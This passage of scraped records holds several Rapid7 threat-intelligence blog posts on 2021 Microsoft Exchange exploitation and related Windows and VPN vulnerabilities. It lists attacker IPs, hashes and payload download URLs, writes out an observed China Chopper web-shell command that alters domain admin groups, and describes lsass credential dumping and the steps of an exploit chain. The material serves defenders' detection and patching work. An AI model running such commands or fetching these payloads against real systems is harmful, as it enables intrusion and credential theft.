C:\\ProgramData\\COM\\zfwqn\\ \nFilepath | C:\\root\\ \nFilepath | C:\\Users\\Public\\ \nFilepath | C:\\Users\\Public\\Opera\\ \nFilepath | C:\\Windows\\temp\\ \nFilename | 1.txt \nFilename | 2.bat \nFilename | 3.avi \nFilename | b.log \nFilename | c103w-at.zip 
\nFilename | client32.exe \nFilename | code \nFilename | curl.exe \nFilename | demo.dll \nFilename | discover.aspx \nFilename | dsf.exe \nFilename | error.aspx \nFilename | ErrorFF.aspx \nFilename | exshell.psc1 \nFilename | Flogon.aspx \nFilename | lsass.dump \nFilename | m103w.zip \nFilename | nvidia.msi \nFilename | opera_browser.dll \nFilename | opera_browser.exe \nFilename | opera_browser.png \nFilename | OutlookEN.aspx \nFilename | MonitoringLog.cmd \nFilename | MonitoringLog.exe \nFilename | p \nFilename | procdump64.exe \nFilename | Service.Information.rtf \nFilename | TimeoutLogout.aspx \nFilename | 2.bat \nFilename | script1.ps1 \nFilename | test.bat \nIP Address | 178.162.217.107 \nIP Address | 178.162.203.202 \nIP Address | 178.162.203.226 \nIP Address | 85.17.31.122 \nIP Address | 5.79.71.205 \nIP Address | 5.79.71.225 \nIP Address | 178.162.203.211 \nIP Address | 85.17.31.82 \nIP Address | 86.105.18.116 \nIP Address | 198.98.61.152 \nIP Address | 89.34.111.11 \nMD5 | 7a6c605af4b85954f62f35d648d532bf \nMD5 | e1ae154461096adb5ec602faad42b72e \nMD5 | b3df7f5a9e36f01d0eb0043b698a6c06 \nMD5 | c60ac6a6e6e582ab0ecb1fdbd607705b \nMD5 | 42badc1d2f03a8b1e4875740d3d49336 \nMD5 | c515107d75563890020e915f54f3e036 \nSHA1 | 02886f9daa13f7d9855855048c54f1d6b1231b0a \nSHA1 | c7f68a184df65e72c59403fb135924334f8c0ebd \nSHA1 | ab32d4ec424b7cd30c7ace1dad859df1a65aa50e \nSHA1 | ba9de479beb82fd97bbdfbc04ef22e08224724ba \nSHA1 | cee178da1fb05f99af7a3547093122893bd1eb46 \nSHA1 | 2fed891610b9a770e396ced4ef3b0b6c55177305 \nSHA-256 | b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff \nSHA-256 | d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09 \nSHA-256 | bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6 \nSHA-256 | 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87 \nSHA-256 | c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf \nSHA-256 | 076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26 
\nURL | `http://103.212.223.210:9900/nvidia.msi` \nURL | `http://86.105.18.116/news/code` \nURL | `http://86.105.18.116/news/opera_browser.dll` \nURL | `http://86.105.18.116/news/opera_browser.exe` \nURL | `http://86.105.18.116/news/opera_browser.png` \nURL | `http://89.34.111.11/3.avi` \nURL | `http://microsoftsoftwaredownload.com:8080/c103w-at.zip` \nURL | `http://microsoftsoftwaredownload.com:8080/m103w.zip` \nURL | `http://p.estonine.com/p?e` \nURL | http://<REDACTED_HOSTNAME>/owa/auth/ /zfwqn \nURL | http://<REDACTED_HOSTNAME>/owa/auth/%20/zfwqn \n \n### References:\n\n * <https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>\n * <https://aka.ms/ExchangeVulns>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>\n * <https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>", "cvss3": {}, "published": "2021-03-23T14:04:36", "type": "rapid7blog", "title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-18913", "CVE-2019-19781", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-23T14:04:36", "id": "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "href": "https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nOn March 2, 2021, the 
Microsoft Threat Intelligence Center (MSTIC) [released details on an active state-sponsored threat campaign](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) exploiting four zero-day vulnerabilities in on-premises instances of Microsoft Exchange Server. MSTIC attributes this campaign to HAFNIUM, a group \u201cassessed to be state-sponsored and operating out of China.\u201d\n\nRapid7 detection and response teams [have also observed increased threat activity](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>) against Microsoft Exchange Server since Feb. 27, 2021, and can confirm ongoing mass exploitation of vulnerable Exchange instances. Microsoft Exchange customers **should apply the latest updates on an emergency basis** and take immediate steps to harden their Exchange instances. We strongly recommend that organizations monitor closely for suspicious activity and indicators of compromise (IOCs) stemming from this campaign. Rapid7 has a comprehensive list of [IOCs available here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>).\n\nThe actively exploited zero-day vulnerabilities disclosed in the MSTIC announcement as part of the HAFNIUM-attributed threat campaign are:\n\n * **[CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)**, also known as [Proxylogon](<https://proxylogon.com/>), is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. According to Orange Tsai, the researcher who discovered the vulnerabilities, CVE-2021-26855 allows code execution when chained with CVE-2021-27065 (see below). A successful exploit chain would allow an unauthenticated attacker to "execute arbitrary commands on Microsoft Exchange Server through only an open 443 port." 
More information and a disclosure timeline are available at <https://proxylogon.com>.\n * **[CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. An attacker who can authenticate with the Exchange server can use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n * **[CVE-2021-26857](<https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857?referrer=blog>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gives an attacker the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n * **[CVE-2021-26858](<https://attackerkb.com/topics/TFFtD6XA8z/cve-2021-26858?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. If an attacker could authenticate with the Exchange server, they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\nAlso included in the out-of-band update were three additional remote code execution vulnerabilities in Microsoft Exchange. 
These additional vulnerabilities are not known to be part of the HAFNIUM-attributed threat campaign but should be remediated with the same urgency nonetheless:\n\n * **[CVE-2021-26412](<https://attackerkb.com/topics/mgKIUMCadN/cve-2021-27078?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n * **[CVE-2021-26854](<https://attackerkb.com/topics/KxXhEt74SK/cve-2021-26412?referrer=blog>)** (CVSS:3.0 6.6 / 5.8)\n * **[CVE-2021-27078](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n\nMicrosoft has released out-of-band patches for all seven vulnerabilities as of March 2, 2021. Security updates are available for the following specific versions of Exchange:\n\n * Exchange Server 2010 (for Service Pack 3\u2014this is a Defense in Depth update)\n * Exchange Server 2013 (CU 23)\n * Exchange Server 2016 (CU 19, CU 18)\n * Exchange Server 2019 (CU 8, CU 7)\n\nExchange Online is not affected.\n\n## For Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to these vulnerabilities with authenticated vulnerability checks. Customers will need to perform a console restart after consuming the content update in order to scan for these vulnerabilities.\n\nInsightIDR will generate an alert if suspicious activity is detected in your environment. The Insight Agent must be installed on Exchange Servers to detect the attacker behaviors observed as part of this attack. If you have not already done so, [install the Insight Agent](<https://docs.rapid7.com/insight-agent/install/>) on your Exchange Servers.\n\nFor individual vulnerability analysis, [see AttackerKB](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=blog#rapid7-analysis>).\n\n## Updates\n\n**Update March 18, 2021:** Microsoft has released a "One-Click Exchange On-premises Mitigation Tool" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. 
Microsoft has said the tool is intended "to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update." They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 15, 2021:** There are now multiple reports of [ransomware](<https://twitter.com/phillip_misner/status/1370197696280027136>) being used after initial compromise of unpatched Exchange servers. Microsoft [has confirmed](<https://twitter.com/MsftSecIntel/status/1370236539427459076>) that it is detecting and blocking a new ransomware strain it calls DearCry. On-premises Exchange customers should continue to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 7, 2021:** Widespread [exploitation and compromise](<https://twitter.com/GossiTheDog/status/1366894548593573893>) of Exchange servers is ongoing. CISA, the U.S. Cybersecurity and Infrastructure Agency, [said on March 6, 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that they are "aware of widespread domestic and international exploitation of these vulnerabilities." Microsoft has [published a script](<https://github.com/microsoft/CSS-Exchange/blob/cb550e399bc2785e958472e533147826e2b6bf24/Security/Test-ProxyLogon.ps1>) to help identify some vulnerable versions of Exchange. 
Because there is [some potential for false negatives](<https://github.com/microsoft/CSS-Exchange/issues/107>), we recommend using this script as a supporting tool rather than as a primary way of confirming vulnerability. Defenders should check the version of Exchange they're running and compare against the known vulnerable versions Microsoft has identified. (Those running older, unsupported versions of Exchange should consider updating as a best practice.)\n\nOn-premises Exchange administrators should continue to treat this widespread threat as an incident response scenario and examine their environments for signs of compromise. Rapid7 has [a list of IOCs here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>), which we will continue to update as new information becomes available. Microsoft has also released [an updated script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that scans Exchange log files for IOCs associated with the vulnerabilities disclosed on March 2, 2021.", "cvss3": {}, "published": "2021-03-03T19:23:42", "type": "rapid7blog", "title": "Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T19:23:42", "id": "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "href": "https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-02T21:07:58", "description": "\n\n_The following blog post was co-authored by Andrew Christian and Brendan Watters._\n\nBeginning Feb. 
27, 2021, [Rapid7\u2019s Managed Detection and Response (MDR)](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) team has observed a notable increase in the automated exploitation of vulnerable Microsoft Exchange servers to upload a webshell granting attackers remote access. The suspected vulnerability being exploited is a [cross-site request forgery (CSRF) vulnerability](<https://www.rapid7.com/fundamentals/cross-site-request-forgery/>): The likeliest culprit is [CVE-2021-24085](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24085>), an Exchange Server spoofing vulnerability released as part of Microsoft\u2019s February 2021 Patch Tuesday advisory, though other CVEs may also be at play (e.g., CVE-2021-26855, CVE-2021-26865, CVE-2021-26857).\n\nThe following China Chopper command was observed multiple times beginning Feb. 27 using the same DigitalOcean source IP (165.232.154.116):\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nExchange or other systems administrators who see this command\u2014or any other China Chopper command in the near future\u2014should look for the following in IIS logs:\n\n * 165.232.154.116 (the source IP of the requests)\n * `/ecp/y.js`\n * `/ecp/DDI/DDIService.svc/GetList`\n\nIndicators of compromise (IOCs) from the attacks we have observed are consistent with IOCs for [publicly available exploit code targeting CVE-2021-24085](<https://github.com/sourceincite/CVE-2021-24085>) released by security researcher [Steven Seeley](<https://twitter.com/steventseeley>) last week, shortly before indiscriminate exploitation began. After initial exploitation, attackers drop an ASP eval webshell before (usually) executing `procdump` against `lsass.exe` in order to grab all the credentials from the box. 
It would also be possible to then clean some indicators of compromise from the affected machine[s]. We have included a section on CVE-2021-24085 exploitation at the end of this document.\n\nExchange servers are frequent, [high-value attack targets](<https://attackerkb.com/search?q=exchange>) whose patch rates often [lag behind attacker capabilities](<https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/>). Rapid7 Labs has identified nearly 170,000 Exchange servers vulnerable to CVE-2021-24085 on the public internet:\n\n\n\n**Rapid7 recommends that Exchange customers apply Microsoft\u2019s February 2021 updates immediately.** InsightVM and Nexpose customers can [assess their exposure to CVE-2021-24085](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-24085/>) and other February Patch Tuesday CVEs with vulnerability checks. InsightIDR provides existing coverage for this vulnerability via our out-of-the-box China Chopper Webshell Executing Commands detection, and will alert you about any suspicious activity. [View this detection](<https://docs.rapid7.com/insightidr/windows-suspicious-process/#attacker-tool>) in the Attacker Tool section of the InsightIDR Detection Library.\n\n## CVE-2021-24085 exploit chain\n\nAs part of the [PoC](<https://github.com/sourceincite/CVE-2021-24085>) for CVE-2021-24085, the attacker will search for a specific token using a request to `/ecp/DDI/DDIService.svc/GetList`. If that request is successful, the PoC moves on to writing the desired token to the server\u2019s filesystem with the request `/ecp/DDI/DDIService.svc/SetObject`. At that point, the token is available for downloading directly. 
The PoC uses a download request to `/ecp/poc.png` (though the name could be anything) and may be recorded in the IIS logs themselves attached to the IP of the initial attack.\n\nIndicators of compromise would include the requests to both `/ecp/DDI/DDIService.svc/GetList` and `/ecp/DDI/DDIService.svc/SetObject`, especially if those requests were associated with an odd user agent string like `python`. Because the PoC utilizes SetObject to write the token to the server\u2019s filesystem in a world-readable location, it would be beneficial for incident responders to examine any files that were created around the time of the requests, as one of those files could be the access token and should be removed or placed in a secure location. It is also possible that responders could discover the file name in question by checking to see if the original attacker\u2019s IP downloaded any files.", "cvss3": {}, "published": "2021-03-02T19:53:28", "type": "rapid7blog", "title": "Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2021-03-02T19:53:28", "id": "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502", "href": "https://blog.rapid7.com/2021/03/02/indiscriminate-exploitation-of-microsoft-exchange-servers-cve-2021-24085/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. 
The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). 
Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. 
ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. 
Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. 
Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * 
[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. 
Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." 
You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. 
Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, they are still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", 
